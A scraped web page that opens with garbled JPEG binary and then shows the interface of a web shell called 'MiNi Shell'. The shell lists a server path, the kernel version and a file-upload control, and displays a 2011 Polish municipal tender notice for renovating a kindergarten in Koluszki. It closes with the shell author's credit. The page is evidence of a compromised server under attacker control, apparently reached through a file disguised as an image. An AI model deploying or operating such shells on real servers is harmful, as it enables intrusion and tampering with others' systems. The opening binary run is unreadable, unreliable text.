JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110523/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110523/144863-N-2011.html

<p class="kh_header"><b>Koluszki: Remont  oraz  termomodernizacja  budynku Przedszkola  nr  2  w  Koluszkach przy 
ul. Reja nr 5</b><br>
<b>Numer ogłoszenia: 144863 - 2011; data zamieszczenia: 23.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Koluszkach , ul. 11-go Listopada 65, 95-040 Koluszki, woj. łódzkie, tel. 044 7256700, faks 044 7145840.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.koluszki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont  oraz  termomodernizacja  budynku Przedszkola  nr  2  w  Koluszkach przy 
ul. Reja nr 5.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia   jest  remont  oraz  termomodernizacja  budynku Przedszkola  nr  2  w  Koluszkach.   Powierzchnia   użytkowa  budynku
wynosi: 1.322, 32 m2  a  kubatura  obiektu  wynosi :  4.078, 81 m3.

W  zakres  realizacji  wchodzą  następujące  prace: 
1)     wykonanie  niezbędnych  robót  rozbiórkowych,  
2)     wykonanie   docieplenia  stropodachu,  wymiana  istniejącego  pokrycia 
        dachowego,  
3)     wymiana  rynien  i  rur  spustowych,  oraz  innych  obróbek  blacharskich,
4)     wymiana  stolarki  okiennej  i  drzwiowej, 
5)     wykonanie  docieplenia   ścian  zewnętrznych  i  ścian  piwnic ,
6)     montaż  konstrukcji  wsporczych  pod  instalację  solarną  oraz  wykonanie 
        instalacji  solarnej, 
7)     przebudowa  schodów  zewnętrznych  z  uwzględnieniem  podjazdu dla 
        niepełnosprawnych ,
8)     przebudowa  tarasów  wraz  z  wykonaniem  nowych  okładzin,   
9)     remont  pomieszczeń  piwnic, 
10)   wykonanie  instalacji  elektrycznej  i  odgromowej, 
11)   wykonanie  modernizacji  istniejącego  węzła cieplnego  dla potrzeb centralnego 
        ogrzewania,  wymianę  instalacji  centralnego  ogrzewania,  wentylacji   
        mechanicznej  wraz  z  wykonaniem  instalacji  solarnej  na  potrzeby ciepłej 
        wody  użytkowej,
12)   przebudowa  instalacji  wodociągowo - kanalizacyjnej, 
13)   remont  i  przebudowa  wewnętrznych  pomieszczeń  wraz  z  budową  
        nowych  przegród,  
14)   wykonanie  tynków  wewnętrznych  projektowanych  ścian  
        oraz  gładzi  gipsowych  ścian  i  sufitów,  wykonanie  posadzek  
        oraz  okładzin  ściennych  i  podłogowych,  
15)   wykonanie  nowego  ogrodzenia  działki  o  długości:  316, 62 mb,
        wraz  z  zagospodarowaniem  terenu  działki. 

Miejsce  realizacji:  budynek  Przedszkola  nr  2  w  Koluszkach  przy  ul.  Reja  
nr  5,  Gmina  Koluszki.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.00.00-6, 45.26.00.00-7, 45.33.00.00-9, 45.42.00.00-7, 45.43.00.00-0, 45.31.00.00-3, 45.11.13.00-1, 45.34.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1) Każdy  Wykonawca  przystępujący do  niniejszego  przetargu  zobowiązany  jest  do wniesienia  wadium   przetargowego  w   wysokości :  40. 000 zł   słownie:  czterdzieści  tysięcy  złotych. 
2) Wadium  może być wnoszone w :  pieniądzu,  poręczeniach  lub gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o  których mowa  w  art. 6b  ust. 5 pkt. 2  Ustawy z dnia 9  listopada 2000 r.  o  utworzeniu  Polskiej  Agencji  Rozwoju Przedsiębiorczości 
( Dz. U. z  2007 r  Nr 42,  poz. 275 ).
3) Wadium  należy  wnieść   najpóźniej  do  dnia  06 czerwca  2011 r. ( włącznie )  przelewem na  konto  nr  31124031611111001004934810   w  Bank  PEKAO  S.A.  
I   o / Koluszki.
4)  Wadium  wniesione w  pieniądzu należy  wnieść  przelewem  najpóźniej przed dniem składania ofert  tak, aby w dniu otwarcia ofert  pieniądze były na koncie Zamawiającego.  
Wadium  wnoszone w  innych formach niż  pieniądz  np. gwarancji  ubezpieczeniowej   musi  być wniesione na dzień składania i otwarcia ofert. 
5) Oryginał  wniesionego wadium  można dołączyć do oferty przetargowej,  
lub zdeponować  w  kasie  Urzędu  Miejskiego w Koluszkach,  a  do oferty załączyć kserokopię dokumentu.
6)  Wadium  wpłacone w  pieniądzu  Zamawiający  przechowa na  oprocentowanym rachunku  bankowym.
7)  Zamawiający  zwraca  wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej  lub unieważnieniu postępowania,  z  wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
8)  Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy,  
jeżeli jego wniesienia żądano.
9)  Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy,  który wycofał ofertę przed upływem terminu składania ofert.
10)  Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium  jeżeli  w  wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego. 
11) Zamawiający  zatrzymuje  wadium  wraz z odsetkami  jeżeli  wykonawca 
w odpowiedzi  na  wezwanie Zamawiającego  o którym mowa w art. 26 ust 3 ustawy Prawo Zamówień  Publicznych,  nie złożył dokumentów  lub oświadczeń o  których mowa w art. 25 ust. 1  lub pełnomocnictw, chyba  że  udowodni,  że  wynika 
to  z  przyczyn  nieleżących  po jego stronie.
12) Zamawiający  zatrzymuje wadium wraz z odsetkami jeżeli wykonawca, którego oferta została wybrana:
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach  określonych w ofercie,
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c) zawarcie umowy w  sprawie  zamówienia  publicznego stało się  niemożliwe 
z  przyczyn  leżących  po  stronie  Wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna  ten  warunek  za  spełniony  na  podstawie  podpisanych  oświadczeń  o  spełnieniu  warunków  udziału  w  postępowaniu  o  których mowa  
w  art. 22 ust. 1  i  24  Ustawy  Prawo  Zamówień  Publicznych,  oraz  gdy  Wykonawca  załączy  aktualny  odpis  z  właściwego  rejestru,  jeżeli odrębne przepisy  wymagają  wpisu  do  rejestru  wystawionego  nie  wcześniej  niż  
6  miesięcy  przed upływem  terminu  składania  ofert. 
Na  podstawie  załączonych  dokumentów  i  oświadczeń  Zamawiający zweryfikuje, 
czy  Wykonawca  spełnia, czy  nie spełnia  warunki  udziału  w  postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna  ten  warunek  za  spełniony na  podstawie  podpisanego  oświadczenia  o  spełnieniu  warunków udziału w  postępowaniu  o  których mowa  
w  art. 22 ust. 1  Ustawy  Prawo  Zamówień  Publicznych,  oraz  gdy  Wykonawca   wykaże,  że  w  okresie  ostatnich  pięciu  lat  przed  upływem terminu   składania   ofert   a  jeżeli  okres prowadzenia  działalności  jest  krótszy - w  tym okresie,  wykonywał   minimum  dwie  realizacje  polegające  na  budowie  nowych  budynków,   lub  remoncie  istniejących  o  wartości brutto  nie  mniejszej   niż  1.000. 000,00  zł   słownie :  jeden  milion  złotych  (  każda   realizacja ). 
Należy   podać   rodzaj  robót,  wartość oraz datę i  miejsce  wykonania  wraz 
z  załączeniem   dokumentów   potwierdzających,  że  roboty  te zostały  wykonane  zgodnie z  zasadami  sztuki  budowlanej  i  prawidłowo  ukończone.
Na  podstawie  załączonych  dokumentów  i  oświadczeń  Zamawiający zweryfikuje, 
czy  Wykonawca  spełnia, czy  nie spełnia  warunki  udziału  w  postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna  ten  warunek  za  spełniony na  podstawie  podpisanego  oświadczenia  o  spełnieniu  warunków udziału w  postępowaniu  o  których mowa  
w  art. 22 ust. 1  Ustawy  Prawo  Zamówień  Publicznych.
Na  podstawie  załączonych  dokumentów  i  oświadczeń  Zamawiający zweryfikuje, 
czy  Wykonawca  spełnia, czy  nie spełnia  warunki  udziału  w  postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna  ten  warunek  za  spełniony na  podstawie  podpisanego  oświadczenia  o  spełnieniu  warunków udziału w  postępowaniu,  o  których mowa  
w  art. 22 ust. 1  Ustawy  Prawo  Zamówień  Publicznych  oraz,  gdy   Wykonawca  dysponuje  lub będzie dysponował  osobami,  które  będą  uczestniczyć  
w  wykonaniu  zamówienia,   a  w  szczególności  będą  odpowiedzialne  za  kierowanie  robotami  budowlanymi  i  osoby  te  będą   posiadały  uprawnienia   budowlane   w  specjalności :
a)   konstrukcyjno - budowlanej,   
b)   elektrycznej, 
c)   instalacyjnej   wod. -  kan.,  wentylacji  i  centralnego  ogrzewania.
Na  podstawie  załączonych  dokumentów  i  oświadczeń  Zamawiający zweryfikuje, 
czy  Wykonawca  spełnia, czy  nie spełnia  warunki  udziału  w  postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na  podstawie  podpisanego  oświadczenie  o  spełnieniu  warunków udziału w  postępowaniu  o  których mowa  
w  art. 22 ust. 1  Ustawy  Prawo  Zamówień  Publicznych.
Na  podstawie  załączonych  dokumentów  i  oświadczeń  Zamawiający zweryfikuje, 
czy  Wykonawca  spełnia, czy  nie spełnia  warunki  udziału  w  postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W  przypadku,  gdy  podmioty  występują  wspólnie  wykonawcy  powinni  ustanowić  pełnomocnika  do  reprezentowania  ich  w  postępowaniu  o  udzielenie  zamówienia,  albo  reprezentowania  w  postępowaniu  i  zawarcia umowy w sprawie zamówienia  publicznego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) Zamawiający dopuszcza zmianę postanowień zawartej umowy w stosunku do treści  oferty na podstawie  której  dokonano  wyboru  wykonawcy w następujących przypadkach :
a)  w  uzasadnionych  przypadkach,  lub  innych  okolicznościach  niezależnych 
od  Zamawiającego  lub  Wykonawcy,  kiedy  konieczna  będzie  zmiana  terminu realizacji zamówienia,  Zamawiający  na  pisemny  wniosek  Wykonawcy  może  przedłużyć   termin  realizacji   zamówienia,
b)  w  innych  uzasadnionych  przypadkach,  gdy  zajdzie  konieczność wprowadzenia  koniecznych  zmian  wynikających  z okoliczności,  których nie można  było przewidzieć  w  chwili  zawarcia  umowy,
c) w  przypadku,  gdy zmiany postanowień  zawartej  umowy będą  korzystne dla Zamawiającego,  a   zmiany   te  wynikły  w  trakcie  realizacji  zamówienia, 
d)  w  przypadku,  gdy  zajdzie  uzasadniona  konieczność  ograniczenia,  lub rezygnacji  z  części  umownego  zakresu robót,  
Zamawiający zastrzega sobie możliwość zmniejszenia  wynagrodzenia umownego  poprzez  korektę  wartości  ryczałtowej  przedmiotu  umowy  po  cenach i  stawkach  wynikających  z  kosztorysu  ofertowego  Wykonawcy,
e)  w  przypadku  ustawowej  zmiany  stawki  podatku  od  towarów i  usług  ( VAT ) cena  netto  pozostanie  bez  zmian,  a  kwota podatku VAT  i  wartość  brutto zostanie  odpowiednio  skorygowana  zgodnie  z  aktualnie  obowiązującymi. przepisami  podatkowymi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.koluszki.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd  Miejski w  Koluszkach  przy ul.  11- go  Listopada 65  pokój  nr 202
Koszt  Specyfikacji Istotnych  Warunków Zamówienia w wersji papierowej  wynosi :
100, 00 zł  słownie:  sto  złotych..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.06.2011 godzina 09:30, miejsce: kancelaria  Urzędu  Miejskiego w  Koluszkach przy  ul. 11 - go Listopada 65.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt  jest  współfinansowany  przez  Unię Europejską  z Europejskiego Funduszu Rozwoju  Regionalnego  w  Ramach   Regionalnego  Programu  Operacyjnego  Województwa  Łódzkiego  na   lata   2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com